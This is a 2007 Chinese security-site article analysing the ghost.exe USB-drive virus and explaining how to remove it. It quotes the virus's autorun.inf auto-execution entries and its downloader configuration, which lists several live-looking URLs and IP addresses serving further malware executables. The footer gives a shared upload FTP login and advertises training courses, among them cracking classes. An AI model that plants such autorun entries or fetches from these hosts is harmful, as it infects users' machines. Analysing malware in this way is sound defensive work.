安全中国首页 > 新闻中心 > 热门病毒信息
 

ghost.exe U盘病毒详细介绍

更新时间:2007-10-6 17:07:20
责任编辑:池天
热 点:
ghost.exe U盘病毒详细介绍

  运行ghost.exe 后生成
  ghost.exe.bat(删除自身)
  C:\WINDOWS\system\conime.exe
  C:\Program Files\WinRAR\WinRAR.exe.tmp

  每个盘符下释放(c d e f g h j k )
  autorun.inf
  ghost.exe

  autorun.inf 文件内容
  [AutoRun]
  OPEN=ghost.exe
  shellexecute=ghost.exe
  shell\打开(&O)\command=ghost.exe

  连入 http://www.dj916.com/ie.txt 下载
  ie.txt 内容
  [main]
  服务文件更新=5
  服务文件地址=http://www.86dy.net/c123.exe

  下载者是否更新=4
  下载个数=7

  文件1=http://222.220.16.185/data6/jwm.exe
  更新1=6
  文件2=http://222.220.16.185/data6/wol.exe
  更新2=6
  文件3=http://222.220.16.185/data6/wo3.exe
  更新3=6
  文件4=http://222.220.16.185/data6/mir.exe
  更新4=6
  文件5=http://222.220.16.185/data6/mhh.exe
  更新5=6
  文件6=http://222.220.16.181/ienet.exe
  更新6=6
  文件7=http://222.220.16.185/data6/zt3.exe
  更新7=6

  这些网址都是下载下来的病毒,没写入注册表,但是我用反汇编看了看这玩意应该修改了讯雷 QQ WINRAR 的注册表。

  处理方法(不包括下载下来的病毒)
  右键=>打开进入每个盘符=>删除
  autorun.inf
  ghost.exe

  删除文件
  C:\WINDOWS\system\conime.exe

  建议重装 qq 讯雷 WINRAR

  最后我还发现个玩意
  00407345 MOV EDX,123.004076B4 你好瑞星 我喜欢你~

  作者难不成暗恋瑞星??

 
安全中国网友投稿专用上传FTP空间:
Ftp服务器:download.anqn.com
Ftp端口:21
用户名:anqn
密 码:anqn.com
 
学习软件编程开发技术,推荐加入以下软件编程培训班:
易语言软件编程培训班(简单易学)  Delphi软件编程培训班  VC++软件编程培训班
VB软件编程培训班  JAVA高端编程就业研发班

学习网站开发制作技术,推荐加入以下网站开发培训班:
ASP.net网站开发项目实战班  ASP语言网站建设培训班

学习网络安全入侵防护技术,推荐加入以下技术培训班:
大型网络安全入侵防护班  网站脚本程序全方位安全检测班

学习网络管理、网吧运营维护技术(网管),推荐加入以下培训班:
大型网吧技术管理人才特训班  Linux网络嵌入架构工程师培训班

学习专项特殊技术,推荐加入以下专项技术培训班:
软件与游戏外挂脱壳破解班(逆向工程)  赚钱王道-网赚技能培训班  Flash动画设计师就业特训班